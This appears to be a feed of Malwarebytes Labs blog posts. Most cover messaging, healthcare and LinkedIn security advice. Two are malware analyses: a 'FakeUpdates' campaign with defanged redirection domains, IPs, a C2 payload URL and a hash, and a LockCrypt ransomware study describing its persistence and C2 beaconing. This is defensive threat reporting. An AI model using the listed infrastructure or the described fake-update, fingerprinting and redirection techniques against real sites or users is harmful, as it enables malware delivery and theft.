1) Securing IMs with company-issued mobile devices. Many people will happily use their own phones for work-related activities, which could pose a risk if left unsecured. These policies should typically be decided upon by the business itself, but that’s not quite accurate, with various authorities taking a dim view of Bring Your Own Device (BYOD, also known as Shadow IT).

As a result, many orgs will now simply issue locked down, pre-secured phones, which don’t allow things like user initiated installation of apps. It’s also a lot easier to kill those phones remotely if lost, rather than a general smattering of panic as Steve from marketing tries to remember if he signed his personal phone up to a find my phone service.

2) The usual staff training on best practices and sensible device use, in particular extending the training into the types of message sent, and why sending company secrets around by SMS is probably a bad idea.

3) Monitor messages sent on the network. This is tricky, especially when the company decides to use an ultra-secure messaging app. How do you monitor and log the message content when everything is scrambled? Companies must decide what falls in line with their own practices, whether that’s fully secured (and thus unable to be monitored) messaging, or secured with monitoring capabilities.

There are many solutions out there which can control comms, block out keywords or phrases (and send a message back to base if it detects something like a corporate secret being mentioned), in addition to logging and archiving multiple types of IM messaging.

In fact, providers of IM for business will often include their own (occasionally limited) archiving or logging for ease of use, and will work with compliance solution providers to ensure a result which works for everyone (besides the would-be corporate secrets sharer).

Generally speaking, business IMs are much more secure that personal IMing (or at least, given the possibility for getting in trouble with the law, it should be), but the weight of said security tends to lie in the direction of the parent company. The employee is just one part of a large machine trying to keep the organisation as a whole safe from harm.

The personal cases

Of course, with the device being fully your own, you’re free to break out of necessarily restrictive business requirements and grab whatever tool you like to send an instant message. The flipside is, you’re completely on your own and the standard, boilerplate caveats about “not downloading random junk that’s bad for your phone” applies.

There are many, many piece of coverage online about secure instant messaging. You can easily dig through lots of top five style lists and see what, exactly, is on offer versus your needs and expectations. Perhaps you want no frills IM lockdown. Maybe you want the ability to send secure SMS, even accounting for the fact you may need to do a little reading to help you on your way.

Whatever you need, there is absolutely going to be something out there for you which fills the gap alongside in-depth instructions for using your shiny new messaging system. Half the time, the biggest problem is convincing the friends or relatives you want to communicate securely with to download the same program. Apart from that potential roadblock, secure IM is but a few clicks away.

The real-world case

What I tend to be most interested in with regards secure IM isn’t so much the app going horribly wrong, but the possible assumption that after a quick download the job is done and your messages are safe forever. In practice, we tend to forget really obvious problems where secure bits of text are concerned. You may wish to keep the following in mind:

1) Your messages are likely more than secure enough if you’re using one of the apps from the “what’s on offer” link up above, be it Signal, Telegram, or Wickr. The problem is that you still have them all sitting there in plain text, on your phone screen, for anyone to see. While this may seem obvious, you’d be amazed at the number of people who loudly state everything from date of birth to bank details on a bus / train / plane / quite literally anything at all.

By the same token, people leave their devices unattended all over the place, often without any sort of lock screen enabled. If you have messages you’d really rather not expose to prying eyes, consider leaving them well alone in public unless absolutely necessary. If that’s not possible, be aware of your surroundings and keep an eye out for potential shoulder surfers.

You should also keep in mind that not everyone you talk to on IM may be trustworthy; sure, the messages are sent in a secure manner but that doesn’t mean the recipient can’t take a bunch of screenshots and post them online.

2) Did I mention lock screens? I hope so, because those are really, really useful for helping to ward off a case of exposed message syndrome should your phone be lost or stolen. If you have an iPad or iPhone, then this comprehensive guide to locking your screen is what you need. If you’re on Android, the same deal applies.

3) Unfortunately, the lock screen isn’t a magic bullet. Depending on your specific device, which network you’re with, and how many security options you’ve set, you may well be able to disable any locks applied via various network operated websites. In theory, a clever social engineer could pretend to be you, find the lost phone (skip this part if they stole it), and log right in.

Either way, if find my phone doesn’t work, or the device is languishing somewhere utterly inaccessible like a really big storm drain, you should have the “wipe device remotely” option available at least. Sure, your texts will go bang, but in a situation like that, you’d likely have additional content on the phone you wouldn’t want going public anyway.

The first rule of collateral damage club is don’t join collateral damage club.

Otherwise, cut your losses and hope you made a backup first.

Instant messaging might have fallen out of the news cycle a little over the years, but it never really went away and is still one of the best methods for communication around. Better than that, there’s now a truly diverse set of options available to give yourself the privacy you feel you might need when sending an IM.

You may not need locked down messaging right now, but should the situation ever arise, the tech is ready. Just make sure you have the real-world considerations locked down, too.

The post Keeping your business and personal instant messages secure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

‘FakeUpdates’ campaign leverages multiple website platforms

Malwarebytes - Tue, 04/10/2018 - 15:00

A malware campaign which seems to have started at least since December 2017 has been gaining steam by enrolling a growing number of legitimate but compromised websites. Its modus operandi relies on social engineering users with fake but convincing update notifications.

Similar techniques were used by a group leveraging malvertising on high traffic websites such as Yahoo to distribute ad fraud malware. The patterns are also somewhat reminiscent of EITest’s HoeflerText campaign where hacked websites are scrambled and offer a font for download. More recently, there has been a campaign affecting Magento websites that also pushes fake updates (for the Flash Player) which delivers the AZORult stealer by abusing GitHub for hosting.

Today, we are looking at what we call the ‘FakeUpdates campaign’ and describing its intricate filtering and evasion techniques. One of the earliest examples we could find was reported by BroadAnalysis on December 20, 2017. The update file is not an executable but rather a script which is downloaded from DropBox, a legitimate file hosting service, as can be seen in the animation below.

Figure 1: A typical redirection to the ‘FakeUpdates’ scheme from a hacked site

This campaign affects multiple Content Management Systems (CMS) in somewhat similar ways. Several of the websites we checked were outdated and therefore vulnerable to malicious code injection. It is possible that attackers used the same techniques to build their inventory of compromised sites but we do not have enough information to confirm this theory.

WordPress and Joomla

Both WordPress and Joomla sites that were hacked bear the same kind of injection within their CMS’ JavaScript files.

Figure 2: A Compromised WordPress site pushing a fake Google Chrome update

Figure 3: A Compromised Joomla site pushing a fake Mozilla Firefox update

Some commonly injected files include the jquery.js and caption.js libraries where code is typically appended and can be spotted by doing a comparison with a clean copy of the same file.

Figure 4: Diffing a clean and suspicious copy of the same library

The additional blurb of code is responsible for the next chain of events that loads the fraudulent layer onto the website you are visiting. The image below shows a beautified version of the code injected in the CMS platforms, whose goal is to call the redirection URL:

Figure 5: Injected code responsible for the redirection

We wrote a simple crawler to browse a list of sites and then parsed the results. We were able to identify several hundred compromised WordPress and Joomla websites even after a small iteration through the list. Although we don’t have an exact number of sites that are affected, we surmise that it is in the thousands.

Figure 6: A partial list of compromised sites


Squarespace is another popular Content Management System that is also affected by the same campaign. This was pointed out by @Ring0x0 and we found a forum post dated February 28, where a Squarespace user is asking for help, saying “it basically redirected me to a full page “your version of chrome needs updating“”.

Figure 7: A Squarespace user reporting that their sites was tampered with

So I login to the admin panel and in the GIT HISTORY it shows that one of my users which has never even logged in before, has sent an upload: site-bundle.js last week, along with some other big list of files {sic}.

We dug deeper into these compromises and identified a slightly different redirection mechanism than the one used on WordPress or Joomla sites. With Squarespace, a blurb of JavaScript is injected directly into the site’s homepage instead.

Figure 8: Traffic showing a malicious redirection taking place on a Squarespace site

It pulls a source file from query[.]network that in turn retrieves bundle.js from boobahbaby[.]com:

Figure 9: The injected code present in hacked Squarespace sites 

bundle.js contains the same script we described earlier that is used to call the redirection URL:

Figure 10: The same redirection code used in WP and Joomla infections is used here

According to this PublicWWW query, a little over 900 SquareSpace sites have been injected with this malicious redirection code.

Figure 11: Identifying other hacked Squarespace sites using a string pattern

Redirection URL and filtering

All CMSes trigger redirection URIs with similar patterns that eventually load the fraudulent update theme. Based on our tests, the URIs have identifiers that apply to a particular CMS; for example cid=221 is associated with WordPress sites, while cid=208 with Joomla.

WordPress track.positiverefreshment[.]org/s_code.js?cid=221&v=8fdbe4223f0230a93678 track.amishbrand[.]com/s_code.js?cid=205&v=c40bfeff70a8e1abc00f track.amishbrand[.]com/s_code.js?cid=234&v=59f4ba6c3cd7f37abedc track.amishbrand[.]com/s_code.js?cid=237&v=7e3403034b8bf0ac23c6 Joomla connect.clevelandskin[.]com/s_code.js?cid=208&v=e1acdea1ea51b0035267 track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba track.amishbrand[.]com/s_code.js?cid=226&v=4d25aa10a99a45509fa2 SquareSpace track.amishbrand[.]com/s_code.js?cid=232&v=47acc84c33bf85c5496d Open Journal Systems track.positiverefreshment[.]org/s_code.js?cid=223&v=7124cc38a60ff6cb920d Unknown CMS track.positiverefreshment[.]org/s_code.js?cid=211&v=7c6b1d9ec5023db2b7d9 track.positiverefreshment[.]org/s_code.js?cid=227&v=a414ad4ad38395fc3c3b

There are other interesting artifacts on this infrastructure, such as an ad rotator:

But if we focus on the redirection code itself, we notice that potential victims are fingerprinted and the ultimate redirection to the FakeUpdates template is conditional, in particular with only one hit per single IP address. The last JavaScript is responsible for creating the iframe URL to that next sequence.

Figure 12: Fingerprinting, cookie verification and iframe redirection are performed here

FakeUpdates theme

There are templates for the Chrome, Firefox and Internet Explorer browsers, the latter getting a bogus Flash Player update instead.

Click to view slideshow.

Figure 13: Attackers are targeting browsers with professional looking templates

The decoy pages are hosted on compromised hosts via sub-domains using URIs with very short life spans. Some of those domains have a live (and legitimate website) whereas others are simply parked:

Legitimate (shadowed) domain:


Figure 14: This property’s credentials have most likely been stolen and used to register a malicious subdomain

Parked domain:


Figure 15: Parked domains can hide ulterior motives

Final infection chain and payloads

The infection starts with the fake update disguised as a JavaScript file retrieved from the Dropbox file hosting service. The link to Dropbox, which is updated at regular intervals, is obfuscated inside of the the first web session belonging to the fake theme.

Figure 16: the fileURL variable contains the Dropbox URL

This JavaScript is heavily obfuscated to make static analysis very difficult and also to hide some crucial fingerprinting that is designed to evade virtual machines and sandboxes.

Figure 17: The malicious JavaScript downloaded from DropBox

According to this very good and detailed analysis of the JS file, this is because step2 of the victim’s profiling uses WScript.Network and WMI to collect system information (BIOS, manufacturer, architecture, MAC address, processes, etc) and eventually makes the decision to continue with the payload or end the script without delivering it.

A failed infection will only contain 2 callbacks to the C2 server:

Figure 18: A host that is not a genuine machine was detected and infection aborted

While a successful infection will contain 3 callbacks to the C2 server (including the payload):

Figure 19: When all checks pass, the user is served the payload

The encoded payload stream is decoded by wscript.exe and a malicious binary (Chrome_71.1.43.exe in this case), dropped in the %temp% folder. That file was digitally signed and also employed various evasion techniques (such as an immediate reboot) to defeat sandboxes.

Figure 20: A digitally signed file is no guarantee for safety

Upon examination, we determined that this is the Chtonic banking malware, a variant of ZeusVM. Once the system has restarted, Chtonic retrieves a hefty configuration file from 94.100.18[.]6/3.bin.

In a second replay attempt, we got the NetSupport Remote Access Tool, a commercial RAT instead. Its installation and configuration were already well covered in this blog. Once again, we noticed the heavy use of obfuscation throughout the delivery of this program that can be used for malicious purposes (file transfer, remote Desktop, etc.).

Figure 21: Traffic from the RAT infection, showing its backend server


This campaign relies on a delivery mechanism that leverages social engineering and abuses a legitimate file hosting service. The ‘bait’ file consists of a script rather than a malicious executable, giving the attackers the flexibility to develop interesting obfuscation and fingerprinting techniques.

Compromised websites were abused to not only redirect users but also to host the fake updates scheme, making their owners unwitting participants in a malware campaign. This is why it is so important to keep Content Management Systems up to date, as well as use good security hygiene when it comes to authentication.

Malwarebytes blocks the domains and servers used in this attack, as well as the final payload.

Indicators of compromise

Redirection infrastructure:

23.152.0[.]118 84.200.84[.]236 185.243.112[.]38 eventsbysteph[.]com query[.]network connect.clevelandskin[.]net connect.clevelandskin[.]org track.amishbrand[.]com track.positiverefreshment[.]org

Dropped binaries:


6f3b0068793b277f1d948e11fe1a1d1c1aa78600712ec91cd0c0e83ed2f4cf1f 94.100.18[.]6/3.bin

NetSupport RAT


The post ‘FakeUpdates’ campaign leverages multiple website platforms appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 02 – April 08)

Malwarebytes - Mon, 04/09/2018 - 15:16

Last week, we took a look at fake Whatsapp antics, dubious gaming extensions, and a huge Panera bread breach. There was also LockCrypt ransomware to contend with, we had a poke around Linkedin, and we published another Physician, protect thyself blog.

Other news

Stay safe, everyone!

The post A week in security (April 02 – April 08) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs CTNT report shows shift in threat landscape to cryptomining

Malwarebytes - Mon, 04/09/2018 - 13:00

It’s that time again! Time for the quarterly Malwarebytes Labs Cybercrime Tactics and Techniques report (aka the Labs CTNT report). To get a more complete picture of what’s been going on in cybercrime this quarter, the Labs team has combined intel and statistics gathered from January through March 2018 from our Intelligence, Research, and Data Science teams with telemetry from both our consumer and business products, which are deployed on millions of machines.

Here’s what we learned about cybercrime in the first quarter of 2018.

Cryptomining is king

Malicious cryptomining has taken over in 2018, and it’s leaving all other malware families behind. From drive-by mining attacks via browser to scams meant to drain users’ cryptowallets, cybercriminals are taking every opportunity to exploit the rising value and popularity of Bitcoin and other cryptocurrencies.

Even though adware retained its position as our number one consumer detection, it did so only by the skin of its teeth, as malware-based cryptomining is now nipping at its heels in the number two spot. In addition, detections of cryptomining malware for businesses increased by 27 percent over last quarter, bringing it up to the second-highest overall threat detection for businesses this quarter.

Ransomware and spyware try to keep up

But while cryptomining took over, it wasn’t the only game in town. Bad actors continued to experiment with ransomware development and distribution, and spyware kept climbing the charts, usurping hijackers as our number one business detection.

January and February saw unusually low consumer ransomware detections, but during the same timeframe, we saw GandCrab appear as the first ransomware to ask its victims for a cryptocurrency other than Bitcoin. Meanwhile, business ransomware detections are up by 28 percent, but the overall volume remains low, as the threat is unable to crack into the top 5 business detections this quarter.

Spyware became our number 1 detection for businesses this quarter, with an increase of 56 percent from the previous quarter. After a dip at the end of last quarter, spyware detections crept up in December, with January being our most heavily-detected month. The spike is likely due to a malspam campaign delivering the Emotet spyware. Shortly after the spike, spyware was observed dropping significantly near the end of the quarter.

Major vulnerabilities unearthed

The public disclosure of the Meltdown and Spectre vulnerabilities sent software and hardware vendors into a full-blown panic mode, releasing patch after patch to try and mitigate the damage. Cybercriminals capitalized on fear and uncertainty by using social engineering scams to trick users into uploading the latest “patches,” only to infect them with malware.

To read more about cryptomining’s takeover, other quarterly trends in cybercrime, and our predictions for next quarter, download the full Cybercrime Tactics and Techniques (CTNT) report.

The post Labs CTNT report shows shift in threat landscape to cryptomining appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Physician, protect thyself: An ounce of prevention is worth a pound of cure

Malwarebytes - Fri, 04/06/2018 - 18:33

In part one of our Physician, protect thyself series, we recognized significant security problems within the healthcare industry that need addressing. Health organizations moving from the paper to the ‘puter—a shift meant to improve care and overall patient experience—inadvertently introduced substantial privacy risks to healthcare records. They are suddenly accessible whenever and wherever the patient or medical staff is. Not only that, patient records are now as portable, transferable, alterable, and destructible as they can be—by both good and bad actors. The interconnectedness of devices and systems further compound the risk.

BYOD, the boom of mHealth apps, the cloud, and the lack of awareness among staff have made healthcare cybersecurity more challenging than ever.

These are challenges that, thankfully, two particular staff members of small- to medium-sized hospitals or clinics can tackle, with a little help from others: the Manager and the IT Specialist. They are the prime movers in turning things around for healthcare SMBs (with proper security guidance, of course).

So in part two of this series, we’ll provide them with tips to prepare for new responsibilities that directly affect the state of cybersecurity and privacy readiness.

Did someone say “CISO”?

Security consultants in the healthcare industry advise all organizations to hire their own Chief Information Security Officer (CISO), as health records being moved online calls for information security to be at the forefront of any strategy. Some larger hospitals can likely accommodate this position in their ranks; however, this may not be possible for smaller ones.

For one, healthcare organizations, like other industries, are seeing a shortage of IT security talent. This is because technologies are adopted at a quicker pace than people are getting trained to manage, maintain, and secure them. For another, a majority of healthcare facilities only devote a small budget for security. In this case, it’s not surprising to find that computer systems in SMB hospitals and clinics are ill-equipped to handle cyberattacks, much less have a dedicated IT person overseeing them.

With challenges like these, they could resort to looking into several low-cost alternatives:

  • Avail the service of a virtual CISO (vCISO), which some companies offer
  • Hire internally
  • Expand the job descriptions of particular individuals in the right positions

With point three in mind, the manager position is the likely role to be awarded additional tasks—and for a good reason. Managers have oversight on people, policies, organizational strategy, resources, and communication. And when it comes to introducing change, managers are responsible for planning the direction, communicating it, and overseeing the changes taking place.

The Health Information Manager (HIM), also known as the Health Information Administrator, is viewed as the information specialist in healthcare, as they are responsible for obtaining, examining, ensuring the accuracy of, and protecting patient medical information.

While it is great news that healthcare is now setting an exponentially higher budget for cybersecurity, this is mostly for buying technologies and solutions and not hiring. As such, there is still that need of having the right people to do the job that needs to be done.

And so, without further ado…

The Manager

To up their game, managers must begin thinking about cybersecurity and privacy, and find ways to incorporate them into the daily duties of staff within the facility.

Review current practices

A good place for managers to start is to review current physical security measures they practice within and without hospital or clinical premises. Now you might think, “Hang on, why should managers look into how they lock their doors first when we’re talking about cybersecurity?” What most of us may not realize is that computer security starts with physical security. Is it any wonder that some cybersecurity experts are also fond of lock picking?

Physical security is often overlooked and underestimated. Worse, it is seldom talked about within cybersecurity. With healthcare organizations and facilities that heavily rely on medical devices, systems, and health information all linked together in a network, the need for physical security becomes very real the moment when, say, a DDoS attack renders systems inoperable and causes a power outage that prevents doctors from performing serious care or emergency surgeries in the ICU.

It is imperative that managers think back and assess where the facility stands for compliance with industry standards and security frameworks they’ve adapted.

More importantly, managers must review the facility’s information lifecycle—the stages through which records go—from its creation to its archiving or destruction. Consider the following questions:

  • Have staff consistently followed proper protocol when it comes to the disposal of printed-out patient records and other medical documents? (e.g., Do they just dispose of them in public dumpsters or other containers that are accessible to the public or unauthorized persons?)
  • Have staff consistently followed proper protocol when it comes to the reuse of office furniture where physical or electronic records are kept and/or electronic media (such as CDs and USB sticks)?
  • Are confidential and non-confidential data stored in separate spaces?
  • Are stored records and other sensitive documents encrypted?
  • What’s the policy on data retention?
Identify feasible threats and vulnerabilities

The Manager must then identify what measures need improvement, what additional security procedures they should introduce, and what practices they can scrap (if any) and replace with something more efficient, sound, manageable, and repeatable. This process is called risk assessment. And the Manager may need to talk to staff and third-party vendors for their input.

Consider the following questions:

  • What could possibly happen if a member of staff lost his/her access cards and went unreported for a few days?
  • What could possibly happen if USB ports on computers and devices are left open?
  • How many external vendors have access to their records and/or facility?
  • Can staff access the open web on any computer terminal?
  • Should they consider getting an insurance policy in case of potential damages incurred in the event of a cyberattack?

Note that a regular review (e.g., once a year) of potential vulnerabilities is needed to be on top of critical weaknesses that need to be prioritized.

Introduce a culture of cybersecurity

Educating employees is the first step, but it doesn’t end there. Education is merely part of the security culture the Manager would want to incorporate into the bigger cultural setup in healthcare. His/her ultimate aim is to imbibe security practices to staff to the point that doing them comes naturally, whether they’re within the facility or outside it.

This is the foreseen outcome of an intentional culture of security: people think, act, and behave the same way no matter where they are or where they work. For example, if healthcare personnel are ingrained to treat links and attachments in emails as suspect, they would likely act the same way when they check emails at home.

I mentioned before that people generally have a negative perception about security, and the Manager must realize this. Doing so can help him/her change the tone and language to use when introducing this new culture in an already complicated setup.

As champion, the Manager must create a narrative focusing on the benefits of practicing basic security hygiene and playing their part in securing patient health records. In addition, he/she should be sure that training and awareness campaigns are in place not to hinder or delay them from caring for their patients but actually to increase patient satisfaction, as they have increased the likelihood that their PHI is safe.

Create a cybersecurity training plan

If the Manager doesn’t know where to start in drafting a training plan, the SANS Institute, a company specializing in cybersecurity training and information security, has a robust toolkit they can use to start this off. They may wish to cover the following topics in the plan:

  • Definition of terms, such as phishing
  • Social engineering tactics
  • Scams and fraud tactics
  • Extra: Good computing habits in the workplace
  • Extra: Workplace social media security
Update the hospital or clinic policy to include a section on cybersecurity

To further drive home the need for change and to foster accountability on everyone within the facility, the Manager must also update the current policies to include cybersecurity. At this point, he/she may already have an idea of what to add, given that they already did a review of current practices and assessed potential threats and vulnerabilities in the existing hospital or clinic setup.

Other items the Manager should include in the new section of the policy are:

  • What security software programs are/should be running on endpoints
  • For endpoints facing the open web, what browser and plugins should be installed
  • How and how often sensitive information or PHI are backed up
  • How and when software updates will be applied
  • Which users have admin rights on endpoints
  • Who is responsible for maintaining, enforcing, and reviewing the cybersecurity policy

The Manager must also address security concerns surrounding BYOD, the cloud, internal WiFi, and even working remotely, as many healthcare practitioners have already welcomed these.

Include acceptable usage guidelines, stressing the importance of locking machines, devices, and accounts using multi-factor authentication, and how to report security incidences should a staff encounter one. Furthermore, the policy must clearly state what would happen if a staff is found to be non-compliant, especially in the event of a breach.

After updating the policy, the Manager must then set a review period for the cybersecurity policy to maintain currency and relevancy.

Read: How to create a successful cybersecurity policy

The IT Specialist

For some SMBs, having a dedicated IT department or person is quite uncommon. Many believe that one wouldn’t really need one as long as there is someone responsible for overseeing IT support tasks and ensuring that sensitive information is stored and appropriately protected at all times. However, this may not be applicable to SMB hospitals and clinics due to the nature of their round-the-clock availability and care.

As the lack of a dedicated specialist could mean that such IT tasks may likely fall into the hands of the Manager, at this point, we highly suggest hiring for a specialized IT role. Not only would this ease the burden on managers, who apart from having a ton on their plate are also involved in the care of patients, this would also allow the IT person to focus on providing support for staff and patient needs that only an IT specialist can offer.

These tasks include (but are not limited to) installing and maintaining software on endpoints, configuring hardware to ensure they follow industry standards and internal policies, and monitoring the network for any form of intrusion.

Note that the IT role can be a temporary one, as nowadays, current technology has made it possible for SMBs to survive without an in-house specialist. Healthcare SMBs can also take this route if budget constraints continue to prevent them from keeping an IT person in the long run.

Should the healthcare facility require IT support, they can always avail services of third-parties who can do this for them. Outsourcing IT needs can also avoid a potentially high turnover of professionals, which is experienced by many healthcare SMBs, and address the constant monitoring and managing of BYOD devices. Of course, hiring IT under contract must be bound by the security policies of the facility for its safety and the safety of their patients’ sensitive information.

Regardless of who is wearing the IT tinfoil hat, we suggest the following to beef up the security of the healthcare facility and the scores of valuable data they house.

Introduce an identity and access management (IAM) system

An IAM is a framework that businesses of all sizes use to facilitate digital identities. It allows active employees to access various accounts without the need for multiple logins. With the guidance of the Manager, IT can limit the number of accounts a particular group of employees can access via an IAM.

Examples of such systems are Okta, OneLogin, Centrify, and SailPoint. It’s important for healthcare facilities to control who accesses what accounts or systems to foster accountability and minimize unauthorized access or disclosure of information, either done maliciously or as a result of negligence on the part of the staff.

Schedule regular backup and encryption of information

Now more than even, backing up files has become a necessity—thanks to the proliferation of ransomware. In a previous post, we provided you the 3-2-1 method of backing up that goes like this:

  • Make 3 different copies of your data
  • Store 2 copies in different forms of media
  • Store 1 copy offsite

Furthermore, do not just back up the data, but encrypt them as well.

Read: Backup and lockdown: when device theft strikes

Schedule regular software patching

Perhaps doing this alone would stop a large chunk of attacks, banking on the fact that most healthcare facilities, regardless of size, run on outdated OS and other software.

Disable USB ports on endpoints that do not need them

There are many ways things can go wrong if an endpoint has an open USB that anyone can just plug into. Sure, charging your smartphone device may be the most benign thing you can do with it, but open USB ports also encourage staff to plug in potentially risky external drives. It is safer to disable ports physically or via the Windows registry to mitigate the spread of malware and even the theft of highly-sensitive data.

Tackle issues surrounding free, in-house WiFi

It’s not uncommon for SMB hospitals and clinics to offer free WiFi to patients, visitors, and staff within the facility. The IT specialist must set up the network to meet the needs of both staff and non-staff, starting with making sure that:

  • The main network is separate from the guest network
  • The main network will be able to handle heavy traffic from multiple endpoints, including healthcare IoT devices, and support bandwidth-intensive transfers, such as voiceover wireless LAN
  • The main network is encrypted (WPA)
  • The main network must not be used by personal devices, such as smartphones, tablets, or laptops (but this can be on a case-to-case basis)
  • The guest network must have a limited bandwidth
  • The guest network must have certain websites blocked to discourage bandwidth hogging
  • The guest network must not be able to retrieve sensitive records belonging to patients or the facility
  • The guest network must be secured with a password
  • Users are informed about the facility’s Acceptable Use Policy
Draft a business continuity/disaster recovery plan

The IT Specialist must work with the Manager in creating a plan on what the hospital or clinic will do during and after a breach. After all, as we keep saying, “It’s no longer a matter of ‘if’ but ‘when’ a breach will happen,” so everyone must expect that it will at some point. If they need further help on this, there are guides and templates available online they can customize to their needs. Here’s one from SANS.

Consider using virtualization

Sensitive files leaving the facility’s servers has always been a great concern for healthcare. And for many, virtualization has helped mitigate this pain point. As healthcare is different from other industries, pros and cons to virtualization must be weighed carefully as welcoming virtualization may introduce other complexities the facility may not be equipped to handle. An example of a possible problem the facility might encounter is server or application downtime, which can potentially stop care operations for a period.


Benjamin Franklin once said that an ounce of prevention is worth a pound of cure. And this has never been truer today.

It is encouraging to find that current healthcare leaders are making mature and quick strides in cybersecurity. Studies have shown that majority of threats aimed at the healthcare industry are preventable, and can be mitigated with proper staff education, training, consistent follow-throughs, enforcement of security policies, and continuous compliance with industry standards.

If the Manager and the IT Specialist continue to work with staff and their own resources, they have already made that first difficult step towards a more secure healthcare facility.

The post Physician, protect thyself: An ounce of prevention is worth a pound of cure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Maybe you shouldn’t use LinkedIn

Malwarebytes - Thu, 04/05/2018 - 12:00

For users in outward-facing professions like sales or marketing, social media—in particular, LinkedIn—is a highly popular means of connecting to new opportunities in the field and staying current with industry peers.

For the rest of us, LinkedIn is an outstanding means of aggregating personal information without significant safety controls, irritating all your email contacts, and providing an endless stream of phishes, honeytraps, and scams to security personnel.

While many of us do not have the luxury of severing from social media without a second thought, we do think it’s worth knowing what’s happening with your data at LinkedIn and making an informed decision—just as we suggested for users of Facebook confronting the Cambridge Analytica fiasco.

The privacy controls

Originally, LinkedIn started with not much concern for privacy. If you’re on a social media platform, you want to share, right? Well, typically that’s at your discretion, not an algorithm’s (and certainly not one that loves to share indiscriminately).

Today, LinkedIn has done quite a bit better at making their privacy controls accessible and easier to understand, but it still has a few problems baked into the core of the service.

Google indexing

Currently, new profiles default to allow search engine crawlers to access your name, title, current company, and picture. While you can switch that option off easily, if you don’t do it quick enough, that info will be indexed and public, irrespective of any subsequent privacy changes you make.

Searching within Linkedin based on information you get from Google Cache will often yield profiles of people who thought they set their data to private.

Relationship weighting yields increased access automatically

One thing the late, unlamented Google Plus did right is sever symmetric access levels for connections. While you could choose to disclose everything to a connection, the other person wasn’t obligated to do the same to communicate with you.

This is not the case with LinkedIn. Reducing trust to a “yes” or “no” question reduces the barrier to entry for information thieves. It’s a trivial matter to observe a target’s position within the network, join their peripheral interests or third-degree connections, then use the automatic increase in access to appear more trusted in a later attack. There really isn’t an effective defense against this sort of social network attack because it depends on every single member of the network being forever vigilant.

Relationship weighting is arbitrary with no user control

LinkedIn has three levels of relationship weighting: first-, second-, and third-degree connections. The end user has no control over who gets which category, and all three categories are based on network proximity.

Why is this a problem? Because relationships aren’t symmetric. You might have a need for a contact’s email without wanting to disclose full info on yourself. However, network proximity weighting presumes equivalence for all contacts in each class. On the contrary, a second-degree connection might be of only occasional interest, while a first-degree connection might have utility for only a limited time.

With cookie cutter policies determining the weight of all of your connections, it robs the end user of setting controls appropriate to each relationship. A great example of this is profile phishing. An attacker only needs to succeed once to become a first-degree connection and gain access to everything.  

A very successful honeytrap profile targeting infosec employees

LinkedIn’s security history

LinkedIn has an extensive history of breaches, vulnerabilities, and personal data leaks for both their web and iOS platforms going back many years. At present, they patch quite quickly upon disclosure, but the slow and steady drip of sometimes serious vulnerabilities over years raises some concerns as to whether or not the platform has a culture of security.

Breaches and vulnerabilities happen to everyone. But if they happen publicly and almost annually, the end user might want to think hard before trusting a third party with their data.

The data hoarding

Like some other third party services, LinkedIn doesn’t delete your account. You can “close” it, but the service retains the right to your information indefinitely. So if you “close” your account, and LinkedIn sustains a breach in the future, your data will be there.

Did you forget to opt out of ad targeting before closing? Your data might still be made available for third-party use. The hallmark of a reasonably secure social media platform is control over your own data, and LinkedIn falls short on this. If you’d like to know more about which services will actually delete your data, check out this list from

But I HAVE to use LinkedIn!

You probably don’t. Unless you belong to the handful of industries for which LinkedIn use is standard, a significant number of opportunities still redirect you toward proprietary recruiting platforms, same as always.

If, however, you’re stuck with the service, make sure to log out after each session. Logging out prevents scraping of your network activity, and limits tracking to what you do on the platform. As with most online irritations, ad blockers and anti-tracker extensions can help you keep control of most of your data.

Remember that one of the best defenses against a third-party breach is to think very hard on if you want to trust that third party with your data to begin with. In the case of LinkedIn, the choice is yours. We just want to make sure it’s an informed one.

The post Maybe you shouldn’t use LinkedIn appeared first on Malwarebytes Labs.

Categories: Techie Feeds

LockCrypt ransomware: weakness in code can lead to recovery

Malwarebytes - Wed, 04/04/2018 - 15:00

At the start of the year, it seemed that 2018 was going to be all about cryptominers. They so overwhelmingly dominated the landscape that it looked like no other threat had a chance. However, ransomware is not giving up the field so fast. There have been new variants popping up every couple of months, peering rather shyly around the corner.

At the moment, the most popular ransomware is GandCrab. However, a lesser-known family called LockCrypt has been creeping around under the radar since June 2017. Since it is spread via RDP brute-force attacks that must be manually installed, it has never been a massive threat—and therefore had never been described in detail.

But recently we were contacted by some victims of LockCrypt, so we decided to take a closer look. Our investigation led to some interesting findings, especially when we discovered that the ransomware authors decided to ignore popular advice not to roll your own crypto. As we could easily guess, it introduced weaknesses to the code, along with the possibility to recover the data in some cases.

Analyzed sample


Behavioral analysis

In order to execute properly, the malware must be run as an Administrator. Due to the fact that it is deployed manually by attackers, it doesn’t use any tricks or exploits to automatically elevate its privileges.

Once it is run, it deletes the original sample and drops itself in C:\Windows under the name wwvcm.exe:

It also adds persistence using a registry key:

This ransomware encrypts all the files it can possibly reach. During the process, it enumerates and tries to terminate all running applications so that they will not be blocking access to the attacked files. Executables are also attacked.

The names of the encrypted files are obfuscated—first encrypted and then converted to base64. The random ID is also a part of the name. The extension used is ‘1btc’.

The ransom note is dropped as a TXT file:

Which pops up at the end of the execution.

Looking inside the encrypted files, we saw that they have pretty high entropy. The example below shows a BMP file before and after encryption:

Our initial assessment of the image was that the authors didn’t use a trivial XOR here. It may also look like a file encrypted by stream ciphers (or any ciphers in CBC mode). After looking inside the code, we will know more about it.

Looking at the changes made in the registry, we found more data left there by the ransomware, such as the unique ID of the victim:

Network communication

The malware is capable of encrypting without an Internet connection. However, if we run it on a connected machine, it beacons to its CnC. The CnC IP is (located in Iran).

Here’s a fragment of the communication:

The bot sends base64 encoded data about the attacked machine, such as the random ID, username, operating system, and the path from where the malware was deployed. Example:


Decodes to:

Y8RASU473R6T35c7','Windows 7 Professional|tester|C:\Users\tester\Desktop\lockcrypt.exe

The server sends back a block of bytes, which looks like some random or encrypted data. Its exact role we will find out by looking into the code.

Inside the code

The sample is not packed by any external crypter, nor is it obfuscated. Once we open it, we can directly see all that it has inside.

At the beginning, the ransomware checks the folder from which it is running. It tries to make a copy in the Windows folder and redeploys itself from that location.

Then, it creates a thread that continuously enumerates all the running processes and tries to terminate them.

